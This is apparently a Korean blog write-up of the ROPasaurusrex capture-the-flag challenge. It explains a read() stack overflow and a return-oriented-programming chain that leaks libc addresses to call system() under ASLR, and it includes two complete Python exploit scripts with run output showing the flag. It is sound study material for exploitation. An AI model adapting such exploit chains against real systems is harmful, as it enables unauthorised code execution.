ROPasaurusrex

ROP 입문을 위해 ROP문제 중에서 가장 쉽다고 알려진 ROP사우루스 문제를 풀어보았다.

 

 

문제 자체는 매우 단순하다.

read() 함수로 입력을 받고, (stdin) write() 함수로 "WIN" 을 출력해준다. (stdout)

 

read() 에서 오버플로우가 발생한다.

 

custom stack 은 .bss 영역이 8바이트밖에 없는 관계로 동적링크를 관리하는 .dynamic 에

커스텀 스택을 구성하였다.

 

system 과 read 차이의 오프셋을 구해서 aslr 이 걸려있다고 생각하고 풀었다.

 

 

서버환경은 aslr

파일환경은 nx

이다.

 

 

payload.py

 

 

from socket import *
from struct import *

# file name is pro!
p = lambda x : pack("<L",x)
up = lambda x : unpack("<L",x)[0]
cmd = "/bin/sh"

host="localhost"
port=4444

# find from objdump -x
# used .dynamic ( custom stack )
dynamic = p(0x08049530)

# find from objdump -D ./pro | grep read
read_plt = p(0x0804832c)
read_got = p(0x0804961c)

# find from objdump -D ./pro | grep write
write_plt = p(0x0804830c)
write_got = p(0x08049614)

# For stack cleaning!
pppr = p(0x080484b6)

# For get system() addr
offset=0x9c9f0

# Let's Make Payload!!!
payload="A"*140
payload+=read_plt
payload+=pppr
payload+=p(0)
payload+=dynamic
payload+=p(len(cmd))

 

payload+=write_plt
payload+=pppr
payload+=p(1)
payload+=read_got
payload+=p(4)

 

payload+=read_plt
payload+=pppr
payload+=p(0)
payload+=read_got
payload+=p(4)

 

payload+=read_plt
payload+=p(0xdeadbeef)
payload+=dynamic

s=socket(AF_INET,SOCK_STREAM,0)
s.connect((host,port))
s.send(payload+"\n")
s.send(cmd)

read = up(s.recv(4))

print "this is read : " + hex(read)
system = read-offset
print "this is system : " + hex(system)

s.send(p(system))

s.send("cat /home/user/pwnable/success.txt\n")

print s.recv(1024)
s.close()

 

 

 

결과는

user@user-virtual-machine:~/pwnable$ python payload.py
this is read : 0xb7ef21f0L
this is system : 0xb7e55800L
you_cant_stop_the_ropasaurusrex

user@user-virtual-machine:~/pwnable$

 

 

 

 

 

참고 문헌

 

https://yous.be/2014/03/19/ropasaurusrex-a-primer-on-return-oriented-programming/

http://mangoplzz.blogspot.kr/2014/01/ropasaurusrex_22.html

고양이보안팀 - plt, got 총정리

 

 

 

 

 

 

 --- 재풀이 ---

문제용 서버를 구축하고

해당 서버의 libc.so.6 을 가져와서 offset 계산함.

payload.py

from struct import *

from socket import *

p=lambda x:pack("<L",x)

up=lambda x:unpack("<L",x)[0]

readplt=0x0804832c

readgot=0x0804961c

writeplt=0x0804830c

offset=0x9c9f0 # system-read=offset

ppppr=0x080484b5

pppr=ppppr+1

ppr=pppr+1

pr=ppr+1

custom_stack=0x08049530 # used .dynamic section

vuln_func=0x0804841d

cmd="cat key"

# char buf; // [sp+10h] [bp-88h]@1

# 0x88 = 136

#    + sfp(4)  = 140

dummy="\x90"*140

def make_connect_socket():

s=socket(AF_INET,SOCK_STREAM)

s.connect(("192.168.0.31",1234))

return s

def destroy_socket(s):

s.close()

def leak_system_addr(s):

payload=""

payload+=dummy

# write(1,readgot,4)

payload+=p(writeplt)

payload+=p(pppr)

payload+=p(0x01)

payload+=p(readgot)

payload+=p(0x04)

# read(0x00,custom_stack,0xff)

payload+=p(readplt)

payload+=p(vuln_func)

payload+=p(0x00)

payload+=p(custom_stack)

payload+=p(0xff)

s.send(payload+"\n")

s.send(cmd+"\n")

read_libc=up(s.recv(1024))

system_libc=read_libc-offset

print "system@libc : " + str(hex(system_libc))

return system_libc

def exploit(system_libc,s):

print "exploit!"

payload=""

payload+=dummy

payload+=p(system_libc)

payload+=p(0xdeadbeef)

payload+=p(custom_stack)

s.send(payload+"\n")

print s.recv(1024)

print s.recv(1024)

if __name__ == "__main__":

sock=make_connect_socket()

systemaddr=leak_system_addr(sock)

exploit(systemaddr,sock)

distroy_socket(sock)

user@ubuntu:~/pwnable/ropasaurusrex$ python payload.py 

system@libc : 0xb7e55800L

exploit!

you_cant_stop_the_ropasaurusrex